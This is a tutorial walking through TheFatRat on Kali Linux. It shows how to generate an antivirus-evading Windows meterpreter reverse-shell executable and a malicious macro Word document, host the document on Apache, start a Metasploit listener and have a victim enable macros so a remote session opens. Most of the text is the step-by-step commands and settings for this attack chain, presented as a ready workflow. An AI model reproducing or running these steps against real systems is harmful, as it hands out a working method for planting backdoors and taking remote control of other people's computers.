TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled malware can be executed on Linux, Windows, Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.
Official Repository: https://github.com/Screetsec/TheFatRat
TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus systems.
cd /opt
git clone https://github.com/Screetsec/TheFatRat.git
chmod -R 755 /opt/TheFatRat/
cd TheFatRat/
./setup.sh
An Updating Kali Repo xterm window will popup as shown below:
After the installation is complete, in the Terminal, type fatrat
and hit enter.
When FatRat launches, starts to verify the installed dependencies, you will get multiple prompts, just type Enter to continue.
On the FatRat menu, choose [06] Create Fud Backdoor 1000% with PwnWindws [Excelent] by typing 6
.
PwnWinds menu appears as shown above, choose the [3] Create exe file with apache + Powershell (FUD 100%) by typing 3
in the menu.
Set the LHOST IP
to your Kali IP; LPORT
to 4444
and the output to payload
as show above.
Next, chose [3] windows/meterpreter/reverse_tcp by typing 3
.
If everything works, fatrat will generate a payload.exe file located on /root/Fatrat_Generated/ as shown below:
Backdoor Saved To : /root/Fatrat_Generated/payload.exe
Go back to the main menu by choosing [9] Back to menu.
On the main menu, choose the [07] Create Backdoor For Office with Microsploit
On the Microsploit menu, choose [2] The Microsoft Office Macro on Windows by typing 2
.
LHOST IP
: [Your Kali IP]LPORT
: 4444Enter the base name for output files
: EvilDocEnter the message for the document body
: you have been PWNED :)y
for yes.3
.
Navigate to output folder of FatRat to you will see the generated Word file.Open another Terminal window and launch metasploit by typing: msfconsole
.
Select the multi/handler:
use multi/handler
Set the payload to meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp
Set the LHOST to your Kali IP and LPORT to 4444:
set LHOST 10.0.2.42
set LPORT 4444
Type run to start the listener:
run
To share the malicious file to Windows machine, copy the Doc file to the apache folder. Open a new Terminal window and type:
cp /root/Fatrat_Generated/EvilDoc.docm /var/www/html/share/
Then, start the apache service:
service apache2 start
Switch to your Windows machine and open the browser.
Type the URL (based on your Kali IP):
http://10.0.2.42/share/
Then, download the malicious doc that you generated.
Open the downloads folder and click the MS Word file.
MS Word open the file in Protected View. Click Enable Editing as shown below:
If you got the SECURITY WARNING because of the Macros, click on Enable Content.
Now Switch back to the Kali, if everything works, you will find that have a Meterpreter session open in the Metasploit terminal.
Now you can view the exploited system details and so on. Informally you can call this action ‘profit’ :)